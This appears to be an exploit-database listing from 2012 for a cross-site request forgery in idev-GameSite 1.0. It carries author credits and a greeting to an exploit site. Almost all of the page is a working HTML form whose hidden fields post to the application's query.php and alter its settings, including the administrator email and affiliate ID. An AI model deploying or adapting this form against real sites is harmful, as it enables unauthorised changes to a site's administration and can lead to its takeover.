Home / exploits idev-GameSite 1.0 Cross Site Request Forgery
Posted on 05 April 2012
# Exploit Title: idev-GameSite 1.0 CSRF # Author: Jonturk75 # Vendor or Software Link: http://idevspot.com/ # Category:: webapps # Demo : http://idevspot.com/demos/idev-gamesite/admin # Greetz: Inj3ct0r Exploit DataBase 1337day.com <form action="../library/query.php?addphoto=1" method="post" name="form1" enctype="multipart/form-data" id="form1"> <input name="controller" value="SETTINGS~update~settings~1" type="hidden"> <input name="EMAIL" class="hiddenarea100" value="idevspot@gmail.com" type="hidden"> <input name="AFFID" class="hiddenarea100" value="" type="hidden"> <input name="Submit" value="Submit" type="submit"> </form>
